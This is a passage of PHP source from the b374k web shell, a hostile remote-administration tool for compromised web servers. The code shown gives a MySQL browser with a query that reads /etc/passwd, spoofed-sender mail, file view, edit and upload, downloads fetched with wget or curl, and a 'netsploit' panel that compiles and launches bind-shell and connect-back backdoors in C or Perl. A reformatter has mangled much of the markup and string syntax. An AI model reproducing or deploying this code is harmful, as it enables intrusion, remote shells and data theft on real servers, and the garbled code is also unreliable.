  637.     submit " value="
  638.     Go!" name="
  639.     submitcmd " />
  640.                 </td></tr></form> </table> </form>
  641.                 <?php
  642.          } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
  643.                 if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
  644.                         $sqlhost = $_GET['sqlhost'];
  645.                         $sqluser = $_GET['sqluser'];
  646.                         $sqlpass = $_GET['sqlpass'];
  647.                         $sqlport = $_GET['sqlport'];
  648.                         if($con = @mysql_connect($sqlhost." : ".$sqlport,$sqluser,$sqlpass)){
  649.                                 $msg .= " < div style = \"width:99%;padding:4px 10px 0 10px;\">";
  650.     $msg. = "<p>Connected to ".$sqluser.
  651.     "<span class=\"gaya\">@</span>".$sqlhost.
  652.     ":".$sqlport;
  653.     $msg. = "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd.
  654.     "&x=mysql&sqlhost=".$sqlhost.
  655.     "&sqluser=".$sqluser.
  656.     "&sqlpass=".$sqlpass.
  657.     "&sqlport=".$sqlport.
  658.     "&\">[ databases ]</a>";
  659.     if (isset($_GET['db']))
  660.         $msg. = "  <span class=\"gaya\">->
  661.  
  662.                                         </span>  <a href=\"?y=".$pwd.
  663.     "&x=mysql&sqlhost=".$sqlhost.
  664.     "&sqluser=".$sqluser.
  665.     "&sqlpass=".$sqlpass.
  666.     "&sqlport=".$sqlport.
  667.     "&db=".$_GET['db'].
  668.     "\">".htmlspecialchars($_GET['db']).
  669.     "</a>";
  670.     if (isset($_GET['table']))
  671.         $msg. = "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd.
  672.     "&x=mysql&sqlhost=".$sqlhost.
  673.     "&sqluser=".$sqluser.
  674.     "&sqlpass=".$sqlpass.
  675.     "&sqlport=".$sqlport.
  676.     "&db=".$_GET['db'].
  677.     "&table=".$_GET['table'].
  678.     "\">".htmlspecialchars($_GET['table']).
  679.     "</a>";
  680.     $msg. = "</p><p>version : ".mysql_get_server_info($con).
  681.     " proto ".mysql_get_proto_info($con).
  682.     "</p>";
  683.     $msg. = "</div>";
  684.     echo $msg;
  685.     if (isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))) {
  686.         $db = $_GET['db'];
  687.         $query = "DROP TABLE IF EXISTS b374k_table;\n
  688.                                         CREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\n
  689.                                         LOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;
  690.                                         SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
  691.         $msg = "<div style=\"width:99%;padding:0 10px;\">
  692.                                         <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  693.         "\" />
  694.  
  695.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  696.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost.
  697.         "\" />
  698.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser.
  699.         "\" />
  700.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport.
  701.         "\" />
  702.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass.
  703.         "\" />
  704.                                         <input type=\"hidden\" name=\"db\" value=\"".$db.
  705.         "\" />
  706.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  707.                                         <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  708.                                         </form></div> ";
  709.         $tables = array();
  710.         $msg. = "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db.
  711.         "</th></tr>";
  712.         $hasil = @mysql_list_tables($db, $con);
  713.         while (list($table) = @mysql_fetch_row($hasil)) {@
  714.             array_push($tables, $table);
  715.         }@
  716.         sort($tables);
  717.         foreach($tables as $table) {
  718.             $msg. = "<tr><td><a href=\"?y=".$pwd.
  719.             "&x=mysql&sqlhost=".$sqlhost.
  720.             "&sqluser=".$sqluser.
  721.             "&sqlpass=".$sqlpass.
  722.             "&sqlport=".$sqlport.
  723.             "&db=".$db.
  724.             "&table=".$table.
  725.             "\">$table</a></td></tr>";
  726.         }
  727.         $msg. = "</table>";
  728.     }
  729.     elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))) {
  730.         $db = $_GET['db'];
  731.         $table = $_GET['table'];
  732.         $query = "SELECT * FROM ".$db.
  733.         ".".$table.
  734.         " LIMIT 0,100;";
  735.         $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  736.  
  737.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  738.         "\" />
  739.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  740.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost.
  741.         "\" />
  742.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser.
  743.         "\" />
  744.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport.
  745.         "\" />
  746.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass.
  747.         "\" />
  748.                                         <input type=\"hidden\" name=\"db\" value=\"".$db.
  749.         "\" />
  750.                                         <input type=\"hidden\" name=\"table\" value=\"".$table.
  751.         "\" />
  752.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">
  753.                                         ".$query.
  754.         "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  755.                                         </form></div> ";
  756.         $columns = array();
  757.         $msg = "<table class=\"explore\" style=\"width:99%;\">";
  758.         $hasil = @mysql_query("SHOW FIELDS FROM ".$db.
  759.             ".".$table);
  760.         while (list($column) = @mysql_fetch_row($hasil)) {
  761.             $msg. = "<th>$column</th>";
  762.             $kolum = $column;
  763.         }
  764.         $msg. = "</tr>";
  765.         $hasil = @mysql_query("SELECT count(*) FROM ".$db.
  766.             ".".$table);
  767.         list($total) = mysql_fetch_row($hasil);
  768.         if (isset($_GET['z'])) $page = (int) $_GET['z'];
  769.         else $page = 1;
  770.         $pagenum = 100;
  771.         $totpage = ceil($total / $pagenum);
  772.         $start = (($page - 1) * $pagenum);
  773.         $hasil = @mysql_query("SELECT * FROM ".$db.
  774.             ".".$table.
  775.             " LIMIT ".$start.
  776.             ",".$pagenum);
  777.         while ($datas = @mysql_fetch_assoc($hasil)) {
  778.             $msg. = "<tr>";
  779.             foreach($datas as $data) {
  780.                 if (trim($data) == "") $data = " ";
  781.                 $msg. = "<td>$data</td>";
  782.             }
  783.             $msg. = "</tr>";
  784.         }
  785.         $msg. = "</table>";
  786.         $head = "<div style=\"padding:10px 0 0 6px;\">
  787.                                         <form action=\"?\" method=\"get\">
  788.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  789.         "\" />
  790.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  791.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost.
  792.         "\" />
  793.  
  794.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser.
  795.         "\" />
  796.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport.
  797.         "\" />
  798.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass.
  799.         "\" />
  800.                                         <input type=\"hidden\" name=\"db\" value=\"".$db.
  801.         "\" />
  802.                                         <input type=\"hidden\" name=\"table\" value=\"".$table.
  803.         "\" />
  804.                                         Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  805.         for ($i = 1; $i <= $totpage; $i++) {
  806.             $head. = "<option value=\"".$i.
  807.             "\">".$i.
  808.             "</option>";
  809.             if ($i == $_GET['z']) $head. = "<option value=\"".$i.
  810.             "\" selected=\"selected\">".$i.
  811.             "</option>";
  812.         }
  813.         $head. = "</select><noscript>
  814.                                         <input class=\"inputzbut\" type=\"submit\" value=\"Go !\" />
  815.                                         </noscript></form></div>";
  816.         $msg = $msgq.$head.$msg;
  817.     }
  818.     elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")) {
  819.         $db = $_GET['db'];
  820.         $query = magicboom($_GET['sqlquery']);
  821.         $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  822.                                 <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  823.         "\" />
  824.                                 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  825.  
  826.                                 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost.
  827.         "\" />
  828.                                 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser.
  829.         "\" />
  830.                                 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport.
  831.         "\" />
  832.                                 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass.
  833.         "\" />
  834.                                 <input type=\"hidden\" name=\"db\" value=\"".$db.
  835.         "\" />
  836.                                 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query.
  837.         "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  838.                                 </form></div> ";@
  839.         mysql_select_db($db);
  840.         $querys = explode(";", $query);
  841.         foreach($querys as $query) {
  842.             if (trim($query) != "") {
  843.                 $hasil = mysql_query($query);
  844.                 if ($hasil) {
  845.                     $msg. = "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.
  846.                     ";   <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  847.                     $msg. = "<table class=\"explore\" style=\"width:99%;\"><tr>";
  848.                     for ($i = 0; $i < @mysql_num_fields($hasil); $i++) $msg. = "<th>".htmlspecialchars(@mysql_field_name($hasil, $i)).
  849.                     "</th>";
  850.                     $msg. = "</tr>";
  851.                     for ($i = 0; $i < @mysql_num_rows($hasil); $i++) {
  852.                         $rows = @mysql_fetch_array($hasil);
  853.                         $msg. = "<tr>";
  854.                         for ($j = 0; $j < @mysql_num_fields($hasil); $j++) {
  855.                             if ($rows[$j] == "") $dataz = " ";
  856.                             else $dataz = $rows[$j];
  857.                             $msg. = "<td>".$dataz.
  858.                             "</td>";
  859.                         }
  860.                         $msg. = "</tr>";
  861.                     }
  862.                     $msg. = "</table>";
  863.                 } else $msg. = "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.
  864.                 ";   <span class=\"gaya\">[</span> error
  865.                                                         <span class=\"gaya\">]</span></p>";
  866.             }
  867.         }
  868.     } else {
  869.         $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";
  870.         $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  871.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  872.         "\" />
  873.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  874.  
  875.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost.
  876.         "\" />
  877.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser.
  878.         "\" />
  879.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport.
  880.         "\" />
  881.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass.
  882.         "\" />
  883.                                         <input type=\"hidden\" name=\"db\" value=\"".$db.
  884.         "\" />
  885.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query.
  886.         "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  887.                                         </form></div> ";
  888.         $dbs = array();
  889.         $msg. = "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  890.         $hasil = @mysql_list_dbs($con);
  891.         while (list($db) = @mysql_fetch_row($hasil)) {@
  892.             array_push($dbs, $db);
  893.         }@
  894.         sort($dbs);
  895.         foreach($dbs as $db) {
  896.             $msg. = "<tr><td><a href=\"?y=".$pwd.
  897.             "&x=mysql&sqlhost=".$sqlhost.
  898.             "&sqluser=".$sqluser.
  899.             "&sqlpass=".$sqlpass.
  900.             "&sqlport=".$sqlport.
  901.             "&db=".$db.
  902.             "\">$db</a></td></tr>";
  903.         }
  904.         $msg. = "</table>";
  905.     }@
  906.     mysql_close($con);
  907. } else {
  908.     $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  909.     echo $msg;
  910. }
  911. } else { ?> < form action = "?"
  912.     method = "get" > < input type = "hidden"
  913.     name = "y"
  914.     value = "<?php echo $pwd; ?>" / > < input type = "hidden"
  915.     name = "x"
  916.     value = "mysql" / >
  917.  
  918.     < table class = "tabnet"
  919.     align = "left"
  920.     style = "width:300px;" > < tr > < th colspan = "2" > Connect to mySQL server < /th>
  921.                          </tr > < tr > < td > & nbsp; & nbsp;
  922.     Host < /td><td>
  923.                          <input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" / > < /td></tr > < tr > < td > & nbsp; & nbsp;
  924.     Username < /td><td>
  925.                          <input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" / > < /td></tr > < tr > < td > & nbsp; & nbsp;
  926.     Password < /td><td>
  927.                          <input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" / > < /td></tr > < tr > < td > & nbsp; & nbsp;
  928.     Port < /td><td>
  929.  
  930.                          <input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" / > & nbsp; < input style = "width:19%;"
  931.     class = "inputzbut"
  932.     type = "submit"
  933.     value = "Go !"
  934.     name = "submitsql" / > < /td></tr > < /table> </form > <? php
  935. }
  936. }
  937. elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')) {
  938.     if (isset($_POST['mail_send'])) {
  939.         $mail_to = $_POST['mail_to'];
  940.         $mail_from = $_POST['mail_from'];
  941.         $mail_subject = $_POST['mail_subject'];
  942.         $mail_content = magicboom($_POST['mail_content']);
  943.         if (@mail($mail_to, $mail_subject, $mail_content, "FROM:$mail_from")) {
  944.             $msg = "email sent to $mail_to";
  945.         } else {
  946.             $msg = "send email failed";
  947.         }
  948.     } ?> < form action = "?y=<?php echo $pwd; ?>&x=mail"
  949.     method = "post" > < table class = "cmdbox" > < tr > < td > < textarea class = "output"
  950.     name = "mail_content"
  951.     id = "cmd"
  952.     style = "height:340px;" > Hey there, please patch me ASAP; - p < /textarea>
  953.                  <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" / > & nbsp;
  954.     mail to < /td></tr > < tr > < td > & nbsp; < input class = "inputz"
  955.     style = "width:20%;"
  956.     type = "text"
  957.     value = "b374k@fbi.gov"
  958.     name = "mail_from" / > & nbsp;
  959.     from < /td></tr >
  960.  
  961.     < tr > < td > & nbsp; < input class = "inputz"
  962.     style = "width:20%;"
  963.     type = "text"
  964.     value = "patch me"
  965.     name = "mail_subject" / > & nbsp;
  966.     subject < /td></tr > < tr > < td > & nbsp; < input style = "width:19%;"
  967.     class = "inputzbut"
  968.     type = "submit"
  969.     value = "Go !"
  970.     name = "mail_send" / > < /td></tr > < /form>
  971.                  <tr><td>    <?php echo $msg; ?></td > < /tr>
  972.                  </table > < /form>
  973.                  <?php
  974.         } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
  975.         @ob_start();
  976.          @eval("phpinfo();");
  977.          $buff = @ob_get_contents();
  978.          @ob_end_clean();
  979.          $awal = strpos($buff,"<body>")+6;
  980.          $akhir = strpos($buff,"</body > ");
  981.          echo " < div class = \"phpinfo\">".substr($buff, $awal, $akhir - $awal).
  982.     "</div>";
  983. }
  984. elseif(isset($_GET['view']) && ($_GET['view'] != "")) {
  985.     if (is_file($_GET['view'])) {
  986.         if (!isset($file)) $file = magicboom($_GET['view']);
  987.         if (!$win && $posix) {
  988.             $name = @posix_getpwuid(@fileowner($file));
  989.             $group = @posix_getgrgid(@filegroup($file));
  990.             $owner = $name['name'].
  991.             "<span class=\"gaya\"> : </span>".$group['name'];
  992.         } else {
  993.             $owner = $user;
  994.         }
  995.         $filn = basename($file);
  996.         echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  997.  
  998.                          <tr><td>Filename</td><td><span id=\"".clearspace($filn).
  999.         "_link\">
  1000.                          ".$file.
  1001.         "</span> <form action=\"?y=".$pwd.
  1002.         "&view=$file\"
  1003.                          method=\"post\" id=\"".clearspace($filn).
  1004.         "_form\" class=\"sembunyi\"
  1005.                          style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\"
  1006.                          value=\"".$filn.
  1007.         "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\"
  1008.                          style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn.
  1009.         "\" />
  1010.                          <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  1011.                          <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  1012.                          onclick=\"tukar('".clearspace($filn).
  1013.         "_link','".clearspace($filn).
  1014.         "_form');\" />
  1015.                          </form> </td></tr> <tr><td>Size</td><td>".ukuran($file).
  1016.         "</td></tr>
  1017.  
  1018.                          <tr><td>Permission</td><td>".get_perms($file).
  1019.         "</td></tr>
  1020.                          <tr><td>Owner</td><td>".$owner.
  1021.         "</td></tr> <tr><td>Create time</td><td>
  1022.                          ".date("d-M-Y H:i", @filectime($file)).
  1023.         "</td></tr> <tr><td>Last modified</td>
  1024.                          <td>".date("d-M-Y H:i", @filemtime($file)).
  1025.         "</td></tr>
  1026.                          <tr><td>Last accessed</td><td>".date("d-M-Y H:i", @fileatime($file)).
  1027.         "</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a>
  1028.  
  1029.                          | <a href=\"javascript:tukar('".clearspace($filn).
  1030.         "_link','".clearspace($filn).
  1031.         "_form');\">
  1032.                          rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">
  1033.                          download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td>
  1034.  
  1035.                          <a href=\"?y=".$pwd.
  1036.         "&view=".$file.
  1037.         "\">text</a> | <a href=\"?y=".$pwd.
  1038.         "&view=".$file.
  1039.         "&type=code\">code</a> | <a href=\"?y=".$pwd.
  1040.         "&view=".$file.
  1041.         "&type=image\">image</a>
  1042.                          </td></tr> </table> ";
  1043.         if (isset($_GET['type']) && ($_GET['type'] == 'image')) {
  1044.             echo "<div style=\"text-align:center;margin:8px;\">
  1045.                                  <img src=\"?y=".$pwd.
  1046.             "&img=".$filn.
  1047.             "\"></div>";
  1048.         }
  1049.         elseif(isset($_GET['type']) && ($_GET['type'] == 'code')) {
  1050.             echo "<div class=\"viewfile\">";
  1051.             $file = wordwrap(@file_get_contents($file), "240", "\n");@
  1052.             highlight_string($file);
  1053.             echo "</div>";
  1054.         } else {
  1055.             echo "<div class=\"viewfile\">";
  1056.             echo nl2br(htmlentities((@file_get_contents($file))));
  1057.             echo "</div>";
  1058.         }
  1059.     }
  1060.     elseif(is_dir($_GET['view'])) {
  1061.         echo showdir($pwd, $prompt);
  1062.     }
  1063. }
  1064. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")) {
  1065.     if (isset($_POST['save'])) {
  1066.         $file = $_POST['saveas'];
  1067.         $content = magicboom($_POST['content']);
  1068.         if ($filez = @fopen($file, "w")) {
  1069.             $time = date("d-M-Y H:i", time());
  1070.             if (@fwrite($filez, $content)) $msg = "file saved <span class=\"gaya\">@</span>".$time;
  1071.             else $msg = "failed to save";@
  1072.             fclose($filez);
  1073.         } else {
  1074.             $msg = "permission denied";
  1075.         }
  1076.     }
  1077.     if (!isset($file)) $file = $_GET['edit'];
  1078.     if ($filez = @fopen($file, "r")) {
  1079.         $content = "";
  1080.         while (!feof($filez)) {
  1081.             $content. = htmlentities(str_replace("''", "'", fgets($filez)));
  1082.         }@
  1083.         fclose($filez);
  1084.     } ?> < form action = "?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>"
  1085.     method = "post" >
  1086.  
  1087.     < table class = "cmdbox" > < tr > < td colspan = "2" > < textarea class = "output"
  1088.     name = "content" > <? php echo $content; ?> < /textarea>
  1089.          <tr><td colspan="2">Save as
  1090.          <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" / > < input class = "inputzbut"
  1091.     type = "submit"
  1092.     value = "Save !"
  1093.     name = "save"
  1094.     style = "width:12%;" / > & nbsp; <? php echo $msg; ?> < /td></tr > < /table> </form > <? php
  1095. }
  1096. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')) {
  1097.     if (isset($_POST['uploadcomp'])) {
  1098.         if (is_uploaded_file($_FILES['file']['tmp_name'])) {
  1099.             $path = magicboom($_POST['path']);
  1100.             $fname = $_FILES['file']['name'];
  1101.             $tmp_name = $_FILES['file']['tmp_name'];
  1102.             $pindah = $path.$fname;
  1103.             $stat = @move_uploaded_file($tmp_name, $pindah);
  1104.             if ($stat) {
  1105.                 $msg = "file uploaded to $pindah";
  1106.             } else {
  1107.                 $msg = "failed to upload $fname";
  1108.             }
  1109.         } else {
  1110.             $msg = "failed to upload $fname";
  1111.         }
  1112.     }
  1113.     elseif(isset($_POST['uploadurl'])) {
  1114.         $pilihan = trim($_POST['pilihan']);
  1115.         $wurl = trim($_POST['wurl']);
  1116.         $path = magicboom($_POST['path']);
  1117.         $namafile = download($pilihan, $wurl);
  1118.         $pindah = $path.$namafile;
  1119.         if (is_file($pindah)) {
  1120.             $msg = "file uploaded to $pindah";
  1121.         } else {
  1122.             $msg = "failed to upload $namafile";
  1123.         }
  1124.     } ?> < form action = "?y=<?php echo $pwd; ?>&x=upload"
  1125.     enctype = "multipart/form-data"
  1126.     method = "post" > < table class = "tabnet"
  1127.     style = "width:320px;padding:0 1px;" >
  1128.  
  1129.     < tr > < th colspan = "2" > Upload from computer < /th></tr > < tr > < td colspan = "2" > < p style = "text-align:center;" > < input style = "color:#000000;"
  1130.     type = "file"
  1131.     name = "file" / > < input type = "submit"
  1132.     name = "uploadcomp"
  1133.     class = "inputzbut"
  1134.     value = "Go"
  1135.     style = "width:80px;" > < /p></td > < tr > < td colspan = "2" > < input type = "text"
  1136.     class = "inputz"
  1137.     style = "width:99%;"
  1138.     name = "path"
  1139.     value = "<?php echo $pwd; ?>" / > < /td></tr > < /tr> </table > < /form> <table class="tabnet" style="width:320px;padding:0 1px;">
  1140.          <tr><th colspan="2">Upload from url</th > < /tr>
  1141.          <tr><td colspan="2">
  1142.          <form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
  1143.  
  1144.          <table><tr><td>url</td > < td > < input class = "inputz"
  1145.     type = "text"
  1146.     name = "wurl"
  1147.     style = "width:250px;"
  1148.     value = "http://www.some-code/exploits.c" > < /td>
  1149.          </tr > < tr > < td colspan = "2" > < input type = "text"
  1150.     class = "inputz"
  1151.     style = "width:99%;"
  1152.     name = "path"
  1153.     value = "<?php echo $pwd; ?>" / > < /td></tr > < tr > < td > < select size = "1"
  1154.     class = "inputz"
  1155.     name = "pilihan" > < option value = "wwget" > wget < /option>
  1156.          <option value="wlynx">lynx</option > < option value = "wfread" > fread < /option>
  1157.          <option value="wfetch">fetch</option > < option value = "wlinks" > links < /option>
  1158.  
  1159.          <option value="wget">GET</option > < option value = "wcurl" > curl < /option>
  1160.          </select > < /td><td colspan="2">
  1161.          <input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td > < /tr></form > < /table></td > < /tr> </table > < div style = "text-align:center;margin:2px;" > <? php echo $msg; ?> < /div>
  1162.          <?php
  1163.          } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
  1164.                  if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
  1165.                          $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']);
  1166.                          tulis("bdc.c",$port_bind_bd_c);
  1167.                          exe("gcc -o bdc bdc.c");
  1168.                          exe("chmod 777 bdc");
  1169.                          @unlink("bdc.c");
  1170.                          exe("./bdc
  1171.     ".$port."
  1172.     ".$passwrd." & ");
  1173.                          $scan = exe("
  1174.     ps aux ");
  1175.                          if(eregi(". / bdc $por ",$scan)){
  1176.                                  $msg = " < p > Process found running, backdoor setup successfully. < /p>";
  1177.                          } else {
  1178.                                 $msg = "<p>Process not found running, backdoor not setup successfully.</p > ";
  1179.                          }
  1180.                  } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
  1181.                          $port = trim($_POST['port']);
  1182.                          $passwrd = trim($_POST['bind_pass']);
  1183.                          tulis("
  1184.     bdp ",$port_bind_bd_pl);
  1185.                          exe("
  1186.     chmod 777 bdp ");
  1187.                          $p2=which("
  1188.     perl ");
  1189.                          exe($p2."
  1190.     bdp ".$port." & ");
  1191.                          $scan = exe("
  1192.     ps aux ");
  1193.                          if(eregi("
  1194.     $p2 bdp $port ",$scan)){
  1195.                                  $msg = " < p > Process found running, backdoor setup successfully. < /p>";
  1196.                          } else {
  1197.                                  $msg = "<p>Process not found running, backdoor not setup successfully.</p > ";
  1198.                          }
  1199.                  } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
  1200.                          $ip = trim($_POST['ip']);
  1201.                          $port = trim($_POST['backport']);
  1202.                          tulis("
  1203.     bcc.c ",$back_connect_c);
  1204.                          exe("
  1205.     gcc - o bcc bcc.c ");
  1206.                          exe("
  1207.     chmod 777 bcc ");
  1208.                          @unlink("
  1209.     bcc.c ");
  1210.                          exe(". / bcc ".$ip."
  1211.     ".$port." & ");
  1212.                          $msg = "
  1213.     Now script
  1214.     try connect to ".$ip."
  1215.     port ".$port."...
  1216.     ";
  1217.                  } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
  1218.                          $ip = trim($_POST['ip']);
  1219.                          $port = trim($_POST['backport']);
  1220.                          tulis("
  1221.     bcp ",$back_connect);
  1222.                          exe("
  1223.     chmod + x bcp ");
  1224.                          $p2=which("
  1225.     perl ");
  1226.                          exe($p2."
  1227.     bcp ".$ip."
  1228.     ".$port." & ");
  1229.                          $msg = "
  1230.     Now script
  1231.     try connect to ".$ip."
  1232.     port ".$port."...
  1233.     ";
  1234.                  } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
  1235.                          $pilihan = trim($_POST['pilihan']);
  1236.                          $wurl = trim($_POST['wurl']);
  1237.                          $namafile = download($pilihan,$wurl);
  1238.                          if(is_file($namafile)) {
  1239.                                  $msg = exe($wcmd);
  1240.                          } else {
  1241.                                  $msg = "
  1242.     error: file not found $namafile ";
  1243.                          }
  1244.                  }
  1245.                  ?>
  1246.                  <table class="
  1247.     tabnet "> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
  1248.  
  1249.                  <tr> <td> <table> <form method="
  1250.     post " actions=" ? y = <? php echo $pwd; ?> & amp;
  1251.     x = netsploit ">
  1252.                  <tr><td>Port</td><td><input class="
  1253.     inputz " type="
  1254.     text " name="
  1255.     port " size="
  1256.     26 "
  1257.                  value=" <? php echo $bindport ?> "></td></tr> <tr><td>Password</td><td>
  1258.                  <input class="
  1259.     inputz " type="
  1260.     text " name="
  1261.     bind_pass " size="
  1262.     26 "
  1263.                  value=" <? php echo $bindport_pass; ?> "></td></tr> <tr><td>Use</td>
  1264.                  <td style="
  1265.     text - align : justify "><p><select class="
  1266.     inputz " size="
  1267.     1 " name="
  1268.     use ">
  1269.                  <option value="
  1270.     Perl ">Perl</option>
  1271.  
  1272.                  <option value="
  1273.     C ">C</option></select>
  1274.                  <input class="
  1275.     inputzbut " type="
  1276.     submit " name="
  1277.     bind " value="
  1278.     Bind " style="
  1279.     width: 120px "></td>
  1280.                  </tr></form> </table> </td> <td> <table>
  1281.                  <form method="
  1282.     post " actions=" ? y = <? php echo $pwd; ?> & amp;
  1283.     x = netsploit ">
  1284.                  <tr><td>IP</td><td><input class="
  1285.     inputz " type="
  1286.     text " name="
  1287.     ip " size="
  1288.     26 "
  1289.                  value=" <? php echo((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?> ">
  1290.                  </td></tr> <tr><td>Port</td><td><input class="
  1291.     inputz " type="
  1292.     text " name="
  1293.     backport " size="
  1294.     26 "
  1295.                  value=" <? php echo $bindport; ?> "></td></tr> <tr><td>Use</td><td style="
  1296.     text - align : justify "><p>
  1297.  
  1298.                  <select size="
  1299.     1 " class="
  1300.     inputz " name="
  1301.     use ">
  1302.                  <option value="
  1303.     Perl ">Perl</option>
  1304.                  <option value="
  1305.     C ">C</option></select>
  1306.                  <input type="
  1307.     submit " name="
  1308.     backconn " value="
  1309.     Connect " class="
  1310.     inputzbut " style="
  1311.     width: 120px "></td>
  1312.                  </tr></form> </table> </td> <td> <table> <form method="
  1313.     post "
  1314.                  actions=" ? y = <? php echo $pwd; ?> & amp;
  1315.     x = netsploit "> <tr><td>url</td><td>
  1316.  
  1317.                  <input class="
  1318.     inputz " type="
  1319.     text " name="
  1320.     wurl " style="
  1321.     width : 250px;
  1322.     "
  1323.                  value="
  1324.     www.some - code / exploits.c "></td></tr> <tr><td>cmd</td><td>
  1325.                  <input class="
  1326.     inputz " type="
  1327.     text " name="
  1328.     wcmd " style="
